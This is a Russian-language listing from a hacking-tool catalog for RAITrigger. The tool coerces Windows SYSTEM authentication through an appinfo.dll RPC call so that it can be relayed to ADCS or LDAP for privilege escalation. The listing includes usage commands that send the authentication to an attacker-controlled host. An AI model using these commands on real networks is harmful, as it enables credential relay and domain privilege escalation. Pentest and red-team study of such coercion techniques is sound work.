Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RAITrigger — Локальный триггер аутентификации SYSTEM для ретрансляции | Kitploit
Инструменты/GitHubGitHub/rteccybersec/raitrigger
Повышение привилегийЭксплуатацияЛатеральное перемещениеАутентификацияRed Teaming
GitHubrteccybersec/raitrigger

RAITrigger

Локальный триггер аутентификации SYSTEM для ретрансляции

Репозиторий
173251 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RAITrigger

RPC-функция RAiForceElevationPromptForCOM из библиотеки appinfo.dll позволяет принудить SYSTEM к аутентификации. Это работает только в системах, входящих в домен. Оказывается, эту функцию может вызвать любой пользователь с низкими привилегиями (не для запуска процесса), но для того чтобы вызвать аутентификацию SYSTEM в произвольное место. Это происходит потому, что CreateFileW вызывается от имени SYSTEM к расположению первого входного параметра:



Поскольку олицетворение низкопривилегированного пользователя всё ещё действует, это нельзя использовать как триггер Potato для повышения привилегий с SEImpersonate до SYSTEM:



Но это можно использовать для запроса сертификата учётной записи компьютера в ADCS, когда включена веб-регистрация, с входящей SMB-аутентификацией. Или это можно использовать для LPE с ретрансляцией на LDAP — когда не включена подпись LDAP.

Для запуска SMB-аутентификации:

root@kitploit:~
[*] RAITrigger.exe \\attackerip\test\test.exe

Для запуска HTTP-аутентификации (должна быть включена служба WebClient):

root@kitploit:~
[*] RAITrigger.exe \\hostname@80\test\test.exe

HTTP-аутентификация срабатывает только для систем в доверенной интранет-зоне, поэтому вам нужно будет создать запись ADIDNS для вашего IP-адреса Kali или находиться в той же подсети и использовать, например, Responder. Никогда не используйте полное FQDN, только имя хоста.

Вызов этой функции удалённо (даже с правами локального администратора) приводит к rpc_access_denied, так что это не альтернатива, например, PetitPotam или подобным:



Возможные улучшения

  • Библиотека NtApiDotNet огромна. Использование MIDL-байтов может значительно уменьшить размер сборки, как в SharpSystemTriggers

Благодарности

  • https://github.com/warpnet/MS-RPC-Fuzzer
Скачать инструмент